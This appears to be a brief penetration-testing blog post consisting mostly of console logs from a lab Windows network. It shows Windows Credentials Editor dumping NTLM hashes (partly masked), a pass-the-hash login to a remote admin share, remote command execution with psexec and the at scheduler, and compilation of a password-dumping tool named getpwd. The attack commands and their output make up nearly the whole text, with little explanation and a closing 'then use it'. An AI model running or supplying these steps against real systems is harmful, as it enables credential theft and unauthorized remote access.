Some time ago I tested some techniques, now published quick & dirty as a note to whom it might be interesting.
Test WCE
Source: http://www.ampliasecurity.com
E:\wce_v1_42beta_x32>wce
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Administrator:ACME:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
dax:DAX-RYMZ48Z3EYO:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
DAX-RYMZ48Z3EYO$:ACME:00000000000000000000000000000000:4460E0BCB8CCF37D8A9E81XXXXXXXXXX
E:\wce_v1_42beta_x32>wce -s Administrator:ACME:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Changing NTLM credentials of current logon session (00168AB3h) to:
Username: Administrator
domain: ACME
LMHash: E52CAC67419A9A224A3B10XXXXXXXXXX
NTHash: 8846F7EAEE8FB118AB06BDXXXXXXXXXX
NTLM credentials successfully changed!
E:\wce_v1_42beta_x32>dir \\192.168.16.2\c$
Volume in Laufwerk \\192.168.16.2\c$: hat keine Bezeichnung.
Volumeseriennummer: 5450-733C
Verzeichnis von \\192.168.16.2\c$
21.05.2016 14:44 0 AUTOEXEC.BAT
21.05.2016 15:56
ClientApps
21.05.2016 14:44 0 CONFIG.SYS
21.05.2016 15:00Dokumente und Einstellungen
21.05.2016 17:33 2.229.504 Exchange Server Setup Progress.log
21.05.2016 15:24fax
21.05.2016 15:51Inetpub
21.05.2016 15:52Programme
21.05.2016 15:51Users Shared Folders
21.05.2016 17:33WINDOWS
21.05.2016 14:50wmpub
3 Datei(en) 2.229.504 Bytes
8 Verzeichnis(se), 16.708.521.984 Bytes frei
But for remote execution psexec is needed:
E:\wce_v1_42beta_x32>..\PSTools\psexec \\192.168.16.2 ipconfig
PsExec v2.11 - Execute processes remotely
Copyright (C) 2001-2014 Mark Russinovich
Sysinternals - www.sysinternals.com
Windows-IP-Konfiguration
Ethernet-Adapter LAN-Verbindung des Servers:
Verbindungsspezifisches DNS-Suffix:
IP-Adresse. . . . . . . . . . . . : 192.168.16.2
Subnetzmaske . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . :
ipconfig exited on 192.168.16.2 with error code 0.
E:\wce_v1_42beta_x32>copy wce.exe \\192.168.16.2\c$
1 Datei(en) kopiert.
-> worked
E:\wce_v1_42beta_x32>del wce.exe \\192.168.16.2\c$
Möchten Sie "\\192.168.16.2\c$\*" löschen (J/N)? J
E:\wce_v1_42beta_x32>md \\192.168.16.2\c$\temp
Running commands with at
E:\wce_v1_42beta_x32>at \\192.168.16.2 18:35 cmd /c "ipconfig > c:\temp\ipconf.t
xt"
Neuer Auftrag hinzugefügt. Kennung = 1
E:\wce_v1_42beta_x32>move \\192.168.16.2\c$\temp\ipconf.txt .
E:\wce_v1_42beta_x32>type ipconf.txt
Windows-IP-Konfiguration
Ethernet-Adapter LAN-Verbindung des Servers:
Verbindungsspezifisches DNS-Suffix:
IP-Adresse. . . . . . . . . . . . : 192.168.16.2
Subnetzmaske . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . :
Test pwdump
Source (seems to be down):
http://52.25.198.231/blog/2015/09/02/reading-windows-password/
https://github.com/khuangia/wce
Fork:
https://github.com/govolution/wce
32Bit only as far as I remember.
C:\Dokumente und Einstellungen\dax\Eigene Dateien\getpwd>cl getpwd.cpp /link ps
api.lib advapi32.lib
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.30729.01 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.
getpwd.cpp
Microsoft (R) Incremental Linker Version 9.00.30729.01
Copyright (C) Microsoft Corporation. All rights reserved.
/out:getpwd.exe
psapi.lib
advapi32.lib
getpwd.obj
C:\Dokumente und Einstellungen\dax\Eigene Dateien\getpwd>cl /LD getpwd_dll.cpp
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.30729.01 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.
getpwd_dll.cpp
Microsoft (R) Incremental Linker Version 9.00.30729.01
Copyright (C) Microsoft Corporation. All rights reserved.
/out:getpwd_dll.dll
/dll
/implib:getpwd_dll.lib
getpwd_dll.obj
Creating library getpwd_dll.lib and object getpwd_dll.exp
-> then use it ;).
danielsauder 
Leave a Reply